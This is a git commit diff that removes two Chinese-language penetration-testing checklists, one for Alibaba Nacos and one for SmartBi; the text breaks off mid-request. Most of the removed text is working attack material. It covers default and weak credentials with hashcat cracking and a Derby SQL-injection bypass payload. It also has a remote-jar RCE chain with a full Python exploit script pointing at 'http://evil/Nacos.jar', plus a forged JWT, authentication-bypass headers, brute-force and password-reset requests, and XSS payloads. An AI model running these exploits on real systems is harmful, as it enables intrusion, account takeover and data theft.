update

2025-11-04 18:27:48 +00:00 · 2025-03-10 16:59:48 +08:00 · 2025-03-10 16:59:48 +08:00 · 8eeaa32420
commit 8eeaa32420
parent f73d5f6046
18 changed files with 55 additions and 1861 deletions
--- a/CHECKLIST/Nacos
+++ b/CHECKLIST/Nacos
@ -1,495 +0,0 @@
 # Nacos 漏洞 Checklist
 ## 一、前置知识
 ### 0x01 Nacos 概述
 Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。
 ## 二、默认口令/弱口令
 Nacos 默认帐户名密码：
 ```
 nacos/nacos
 ```
 数据库中的 bcrypt 加密存储示例：
 ```shell
 # nacos
 $2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu
 # Hello123
 $2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG
 ```
 弱口令爆破 with hashcat：
 ```shell
 # nacos
 echo -n '$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu' > hashes.txt
 -----
 hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/YOUR_DICT.txt --force
 -----
 cat result.txt
 $2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu:nacos
 # Hello123
 echo -n '$2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG' > hashes.txt
 hashcat -m 3200 -a 0 -o result.txt hashes.txt ~/HackTools/Dict/YOUR_DICT.txt --force
 -----
 cat result.txt
 $2a$10$rT.ZmZTjj55Xs65yR9ZDdexuLITXfCXkifQv4KpLm7yVLtiBmUHgG:Hello123
 ```
 弱口令爆破 with john the ripper：
 ```shell
 john --wordlist=~/HackTools/Dict/YOUR_DICT.txt hashes.txt
 -----
 john --show hashes.txt
 ?:Hello123
 ```
 ## 三、可能存在的未授权 API
 ### 0x01 用户信息 API
 ```
 /nacos/v1/auth/users?pageNo=1&pageSize=9
 ```
 ### 0x02 集群信息 API
 ```
 /nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
 ```
 ### 0x03 配置信息 API
 ```
 /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=&search=accurate&accessToken=&username=
 # or
 /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=<IF_YOU_KNOW_SOME_TENANT>&search=accurate&accessToken=&username=
 ```
 这一接口在未授权的情况下可能会暴露 Spring、MySQL、Redis、Druid 等配置信息，若存在云环境、文件系统，还可能暴露 accessKey、secretKey 等。
 获取配置信息示例：
 ![image-20230609161347780](images/image-20230609161347780.png)
 获取 ak、sk 示例：
 ![image-20230609161814152](images/image-20230609161814152.png)
 如果返回为 403 Forbidden，可以尝试 CNVD-2023674205 漏洞绕过限制。
 ## 四、 SQL 注入风险 CVE-2021-29442
 ### 漏洞描述
 在使用 Derby 数据库作为内置数据源时，Nacos config server 中有未鉴权接口 `/nacos/v1/cs/ops/derby`，执行 SQL 语句可以查看敏感数据，可以执行任意的 SELECT 查询语句。如果使用外置数据库（如 MySQL），则该接口无法访问。
 漏洞点位于 nacos-config 的 com.alibaba.nacos.config.server.controller.ConfigOpsController。
 ### 漏洞影响
 ```
 Nacos 未鉴权且使用 Derby 数据库作为内置数据源
 ```
 ### 漏洞复现
 poc：
 ```
 /nacos/v1/cs/ops/derby?sql=select+*+from+sys.systables
 # or
 /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st
 ```
 一些查询语句：
 ```
 select * from users
 select * from permissions
 select * from roles
 select * from tenant_info
 select * from tenant_capacity
 select * from group_capacity
 select * from config_tags_relation
 select * from app_configdata_relation_pubs
 select * from app_configdata_relation_subs
 select * from app_list
 select * from config_info_aggr
 select * from config_info_tag
 select * from config_info_beta
 select * from his_config_info
 select * from config_info
 ```
 Bypass payload：
 ```
 /nacos/v1/cs/ops/derby?sql=SELECT--/dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad&sql=/%0a*--/%25&q=dssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssaddssad%&sql=%0afrom--/&sql=/%0ausers
 ```
 使用 Derby 数据库作为内置数据源，且目标系统未开启鉴权功能时，可调用该接口实现 RCE。[RCE payload](http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce):
 1. 创建一个 java 编译并打包成 jar，放置在对应站点下，如：
 ```
 import java.io.IOException;
 public class testShell4 {
    public static void exec() throws IOException {
        Runtime.getRuntime().exec("cmd.exe /c calc");
    }
 }
 ```
 2. sql 语句部分如下：
 ```
 # 导入一个类到数据库中
 CALL SQLJ.INSTALL_JAR('http://127.0.0.1:8088/test.jar', 'APP.Sample4', 0)
 # 将这个类加入到derby.database.classpath，这个属性是动态的，不需要重启数据库
 CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','APP.Sample4')
 # 创建一个PROCEDURE，EXTERNAL NAME 后面的值可以调用类的static类型方法
 CREATE PROCEDURE SALES.TOTAL_REVENUES() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'testShell4.exec'
 # 调用PROCEDURE
 CALL SALES.TOTAL_REVENUES()
 ```
 另一个 [Exploit](https://github.com/vulhub/vulhub/tree/master/nacos/CVE-2021-29442):
 ```
 package test.poc;
 import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.InputStreamReader;
 import java.io.PrintWriter;
 import java.io.StringWriter;
 public class Example {
  public static void main(String[] args) {
    String ret = exec("ipconfig");
    System.out.println(ret);
  }
  public static String exec(String cmd) {
    StringBuffer bf = new StringBuffer();
    try {
      String charset = "utf-8";
      String osName = System.getProperty("os.name");
      if (osName != null && osName.startsWith("Windows"))
        charset = "gbk"; 
      Process p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis, charset);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null)
        bf.append(line); 
    } catch (Exception e) {
      StringWriter writer = new StringWriter();
      PrintWriter printer = new PrintWriter(writer);
      e.printStackTrace(printer);
      try {
        writer.close();
        printer.close();
      } catch (IOException iOException) {}
      return "ERROR:" + writer.toString();
    } 
    return bf.toString();
  }
 }
 ```
 ```
 import random
 import sys
 import requests
 from urllib.parse import urljoin
 import argparse
 def exploit(target, command, service):  
    removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')
    derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
    for i in range(0, sys.maxsize):
        id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8))
        post_sql = f"""CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)
 CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'NACOS.{id}')
 CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'
 """
        get_sql = f"select * from (select count(*) as b, S_EXAMPLE_{id}('{command}') as a from config_info) tmp"
        files = {'file': post_sql}
        post_resp = requests.post(url=removal_url, files=files)
        post_json = post_resp.json()
        if post_json.get('message', None) is None and post_json.get('data', None) is not None:
            print(post_resp.text)
            get_resp = requests.get(url=derby_url, params={'sql': get_sql})
            print(get_resp.text)
            break
 def main():
    parser = argparse.ArgumentParser(description='Exploit script for Nacos CVE-2021-29442')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-c', '--command', required=True, help='Command to execute')
    parser.add_argument('-s', '--service', required=True, help='Service URL')
    args = parser.parse_args()
    exploit(args.target, args.command, args.service)
 if __name__ == '__main__':
    main()
 ```
 ```
 python poc.py -t http://your-ip:8848 -s http://evil/Nacos.jar -c "ps aux"  
 ```
 ### 修复建议
 - [关于Nacos Derby数据库运维接口/nacos/v1/cs/ops/derby相关问题公告](https://nacos-group.github.io/blog/announcement-derby-ops-api/?source=news/)
 ## 五、认证绕过/用户创建 CVE-2021-29441
 ### 漏洞描述
 2020 年 12 月 29 日披露。在 Nacos 进行认证授权操作时，会判断请求的 User-Agent 是否为 ”Nacos-Server”，如果是的话则不进行任何认证。该配置为硬编码，通过该漏洞，攻击者可以获取到用户名密码等敏感信息，且可以进行任意操作，包括创建新用户并进行登录后操作。
 ### 漏洞影响
 ```
 Nacos <= 2.0.0-ALPHA.1
 ```
 ### 漏洞复现
 访问 `/nacos/v1/auth/users?pageNo=1&pageSize=9` ，查看状态码是否为 200，且内容中是否包含 `pageItems`。通过该路由可查询 IP 地址、Nacos 端口、Nacos 版本、raftPort 等信息：
 ```
 http://your-ip:port/nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
 ```
 通过 `/nacos/v1/auth/users` 路由查询已有的用户列表及敏感信息：
 ```
 http://your-ip:port/nacos/v1/auth/users?pageNo=1&pageSize=9
 ```
 ![image-20230609142007526](images/image-20230609142007526.png)
 此处需要注意，大部分企业的 Nacos 的 URL 为 `/v1/auth/users` ，而不是默认的 `/nacos/v1/auth/users`，即：
 ```
 /v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=
 ```
 ```
 /v1/auth/users?pageNo=1&pageSize=9
 ```
 尝试以 POST 方式创建新用户（whoami/whoami）：
 ```
 POST /v1/auth/users HTTP/1.1
 username=whoami&password=whoami
 ```
 ![image-20230609143031183](images/image-20230609143031183.png)
 查看刚才创建的新用户，使用添加的新用户（whoami/whoami）进行登录：
 ```
 GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
 ```
 ![image-20230609143105272](images/image-20230609143105272.png)
 HTTP Request Headers：
 ```
 User-Agent: Nacos-Server
 ```
 ### 修复建议
 1. 修改 Nacos 的 application.properties 配置文件，开启服务身份识别功能，配置后访问 `/nacos/v1/auth/users/?pageNo=1&pageSize=9` 路由将返回 403 Forbidden。
 ```
 # 开启鉴权
 nacos.core.auth.enabled=true
 nacos.core.auth.enable.userAgentAuthWhite=false
 nacos.core.auth.server.identity.key=YOUR-KEY
 nacos.core.auth.server.identity.value=YOUR-VALUE
 ```
 2. Nacos 注册及配置中心开启权限认证，编辑项目中的 bootstrap.yml 或 bootstrap.properties，修改 discovery 和 config 开启用户密码认证（用户名和密码不能带有 %、$ 等会被转义的特殊字符）。
 ## 六、secret.key 默认密钥 CNVD-2023674205
 ### 漏洞描述
 2023 年 3 月 2 日披露。Alibaba Nacos 使用了固定的 secret.key 默认密钥，导致攻击者可以构造请求获取敏感信息，导致未授权访问漏洞。
 ### 漏洞影响
 ```
 Alibaba Nacos <= 2.2.0
 ```
 ### 漏洞复现
 在配置文件 conf/application.properties 中，默认硬编码 nacos.core.auth.plugin.nacos.token.secret.key 的值。
 ```
 nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
 ```
 Nacos 使用 jwt token，算法为 HS256，将 secret.key 的默认值当作 secretKey，生成 Signature。jwt token 的 Payload 为 subject（用户名）和 exp（有效期）。
 我们伪造一个 jwt token，Payload：
 ```
 {
  "sub": "nacos",
  "exp": 1696669333
 }
 ```
 ![image-20230609155053114](images/image-20230609155053114.png)
 伪造的 jwt token：
 ```
 eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5OTg4ODc3N30.bYEColBVGkF-H-kGr9PxWnbmZZp66z77NXUNHXZbbnw
 ```
 进行验证，没有配置 jwt token 时，返回 403 Forbidden：
 ```
 GET /v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=9&tenant=&search=accurate&accessToken=&username= HTTP/1.1
 Host: your-ip
 Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5OTg4ODc3N30.bYEColBVGkF-H-kGr9PxWnbmZZp66z77NXUNHXZbbnw
 ```
 ![image-20230609155124566](images/image-20230609155124566.png)
 修改 Authorization 头，配置 jwt token，返回 200 OK：
 ```
 Authorization: Bearer <jwt token>
 ```
 ![image-20230609155215648](images/image-20230609155215648.png)
 ### 漏洞修复
 1. 修改生成 Token 的 secret.key，推荐自定义密钥时，将配置项设置为 Base64 编码的字符串，且原始密钥长度不得低于 32 字符。
 ```
 #启用认证
 nacos.core.auth.enabled=true
 #生成 Token 的密钥
 nacos.core.auth.plugin.nacos.token.secret.key=base64编码
 ```
 2. 升级到 2.2.0.1 及之后版本。Nacos 官方在 2023.03.02 发布了 2.2.0.1，下载地址：https://github.com/alibaba/nacos/releases/tag/2.2.0.1，最新版本：https://github.com/alibaba/nacos/releases。
 ## 七、identity.key/value 默认值认证绕过
 ### 漏洞描述
 当开启 Nacos 权限认证（nacos.core.auth.enabled=true）后，配置文件中存在默认值：
 ```
 nacos.core.auth.server.identity.key=serverIdentity
 nacos.core.auth.server.identity.value=security
 ```
 该硬编码导致攻击者可以构造携带该 key 和 value 的请求，从而绕过权限认证。
 ### 漏洞影响
 ```
 Nacos <= 2.2.0
 ```
 ### 漏洞复现
 ```
 POST /v1/auth/users HTTP/1.1
 serverIdentity: security
 username=whoami&password=whoami
 ```
 当开启 Nacos 权限认证（nacos.core.auth.enabled=true）后，必须填写 nacos.core.auth.server.identity.key 和 nacos.core.auth.server.identity.value 才能够正常启动。若 `serverIdentity: security` 无法绕过，可以尝试以下键值对：
 ```
 官网示例中的键值对 example:example
 ```
 ```
 搜索引擎解决方案中出现最多的键值对 test:test
 ```
 ### 漏洞修复
 1. 配置自定义身份识别的 key（不可为空）和 value（不可为空）：
 ```
 nacos.core.auth.server.identity.key=example
 nacos.core.auth.server.identity.value=example
 ```
 2. 升级最新版本：https://github.com/alibaba/nacos/releases。
 ## 八、Nacos 集群 Raft 反序列化漏洞
 ### 漏洞描述
 Nacos 在处理某些基于 Jraft 的请求时，采用 Hessian 进行反序列化，但并未设置限制，导致应用存在远程代码执行（RCE）漏洞。
 ### 漏洞影响
 ```
 1.4.0 <= Nacos < 1.4.6  使用cluster集群模式运行
 2.0.0 <= Nacos < 2.2.3  任意模式启动
 ```
 Nacos 1.x 在单机模式下默认不开放 7848 端口，故该情况通常不受此漏洞影响。Nacos 2.x 版本无论单机或集群模式均默认开放 7848 端口。
 ### 漏洞复现
 exp：
 - https://github.com/c0olw/NacosRce/
 ### 漏洞修复
 #### 通用修补建议
 目前官方已发布安全修复更新，受影响用户可以升级到 Nacos 1.4.6、Nacos 2.2.3：
 - https://github.com/alibaba/nacos/releases/tag/1.4.6
 - https://github.com/alibaba/nacos/releases/tag/2.2.3
 #### 临时修补建议
 对外限制开放 7848 端口，一般使用时该端口为 Nacos 集群间 Raft 协议的通信端口，不承载客户端请求，因此老版本可以通过禁止该端口来自 Nacos 集群外的请求达到止血目的（如部署时已进行限制或未暴露，则风险可控）。
--- a/CHECKLIST/SmartBi
+++ b/CHECKLIST/SmartBi
@ -1,493 +0,0 @@
 # SmartBi 漏洞 Checklist
 ## 一、前置知识
 ### 0x01 SmartBi 概述
 Smartbi 是企业级商业智能和大数据分析平台，满足用户在企业级报表、数据可视化分析、自助分析平台、数据挖掘建模、AI 智能分析等大数据分析需求。该软件应用范围较广，据官网介绍，在全球财富 500 强的 10 家国内银行，有 8 家选用了 Smartbi。
 ### 0x02 FOFA指纹
 ```
 app="SMARTBI"
 ```
 ### 0x03 登录入口
 ```
 https://127.0.0.1/vision/mobileportal.jsp
 https://127.0.0.1/vision/mobileX/login
 https://127.0.0.1/vision/index.jsp
 https://127.0.0.1/smartbi/vision/index.jsp
 ```
 密码正确的情况下，部分平台无法登陆，此时设置user-agent为手机端就可以。
 ### 0x04 常见口令
 ```
 demo/demo
 manager/demo
 admin/admin
 admin/manager
 admin/2manager
 ```
 ## 二、认证漏洞
 ### 0x01 登录爆破
 ```
 POST /vision/RMIServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36
 Accept: */*
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/mobileX/login
 content-type: application/x-www-form-urlencoded
 Content-Length: 70
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: JSESSIONID=1DA1DAA51469E646F97AD829F29A2B15
 className=UserService&methodName=login&params=["admin","admin"]
 ```
 抓取 true/false 字段。
 ### 0x02 401认证弱口令
 /vision 目录下的文件都需要 401 认证：
 ```
 admin/admin
 admin/manager
 admin/2manager
 mining/admin
 demo/demo
 manager/demo
 manager/admin
 user/admin
 test/admin
 huanan/admin
 ```
 不论用户名输什么，只要密码正确即可。
 ## 三、信息泄露
 ### 0x01 敏感信息
 #### 查看版本
 ```
 https://127.0.0.1/vision/version.txt
 ```
 ```
 https://127.0.0.1/vision/packageinfo.txt
 ```
 #### 目录遍历
 ```
 https://127.0.0.1/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=%2F
 ```
 #### 信息泄露
 ```
 https://127.0.0.1/vision/monitor/sysprops.jsp
 ```
 ```
 https://127.0.0.1/vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode
 ```
 ```
 https://127.0.0.1/vision/monitor/hardwareinfo.jsp
 ```
 #### 接口泄露
 直接访问 wsdl 无需 401：
 ```
 https://127.0.0.1/vision/listwsdl.jsp
 ```
 提供资源目录树的访问功能：
 ```
 https://127.0.0.1/vision/services/CatalogService?wsdl
 ```
 SimpleReportService 提供灵活报表相关操作功能：
 ```
 https://127.0.0.1/vision/services/SimpleReportService?wsdl
 ```
 BusinessViewService 提供数据集定义相关操作功能：
 ```
 https://127.0.0.1/vision/services/BusinessViewService?wsdl
 ```
 DataSourceService 提供数据源相关操作功能：
 ```
 https://127.0.0.1/vision/services/DataSourceService?wsdl
 ```
 AnalysisReportService 提供多维分析相关操作功能：
 ```
 https://127.0.0.1/vision/services/AnalysisReportService?wsdl
 ```
 UserManagerService 提供用户相关操作，包括读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等：
 ```
 https://127.0.0.1/vision/services/UserManagerService?wsdl
 ```
 ### 0x02 Session劫持
 可重置用户密码，且无需原密码。
 ```
 https://127.0.0.1/vision/monitor/listsessions.jsp
 ```
 ![image-20230717111349311](images/image-20230717111349311.png)
 理论上重置成功，返回为 true，但是实际测试过程中修改后的密码既不是改之前的密码，也不是修改后的密码，过一段时间自动重置为原来的密码。
 ```
 POST /vision/RMIServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
 Accept: */*
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/index.jsp
 If-Modified-Since: 0
 Content-Type: application/x-www-form-urlencoded;charset=UTF-8
 Content-Length: 148
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
 className=UserService&methodName=updateUserForChange&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true]
 ```
 ```
 POST /vision/RMIServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
 Accept: */*
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/index.jsp
 If-Modified-Since: 0
 Content-Type: application/x-www-form-urlencoded;charset=UTF-8
 Content-Length: 133
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299
 className=UserService&methodName=addUserAttribute&params=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","SYSTEM_user_isEdit","0",null]
 ```
 其中I8a94ca4e0175ab4aab4aaae90175d3e824c66a87为用户的id字段，唯一身份标识。
 ### 0x03 Heapdump泄露
 ```
 https://127.0.0.1/vision/monitor/heapdump.jsp
 ```
 ```
 https://127.0.0.1/vision/monitor/heapdump.jsp?dumpbin=true
 ```
 ### 0x04 反射型/存储型XSS
 ```
 https://127.0.0.1/vision/chooser.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E&root=/u01/data/domains/app_domain
 ```
 ```
 https://127.0.0.1/vision/monitor/testmailserver.jsp?host=mail.longtop.com&user=111%22%3E%3Cimg%20src=x%20onerror=prompt(0)%3E&pass=123456
 ```
 登录后个人参数位置，加密后传参可导致存储型 xss。
 ### 0x05 SSRF
 探测出口ip：
 ```
 https://127.0.0.1/vision/monitor/testmailserver.jsp
 ```
 ## 四、SQL注入
 需要登录，任意报表功能，例如：
 ```
 https://127.0.0.1/vision/ssreportServlet
 ```
 ```
 POST /vision/ssreportServlet HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 3293
 Authorization: Basic YWRtaW46YWRtaW4=
 Connection: close
 Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB
 Upgrade-Insecure-Requests: 1
 sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh&paramsInfoEncode=encode=/JV/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu6(dp/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu(SR(D/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uug(SQp/uu/NO/uun111/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uun111/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uug(SQp/uu/NO/uuKK7777/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/Vm/Vx/aK/V'/mt/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~MqRh/uu/ut/uu6(dp/uu/NO/uuRh/uu/ut/uu(SR(D/uu/NO/uu/aM/ON/'7/aM/VJ/'V/aM/mt/VO/aM/ma/'KRh/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/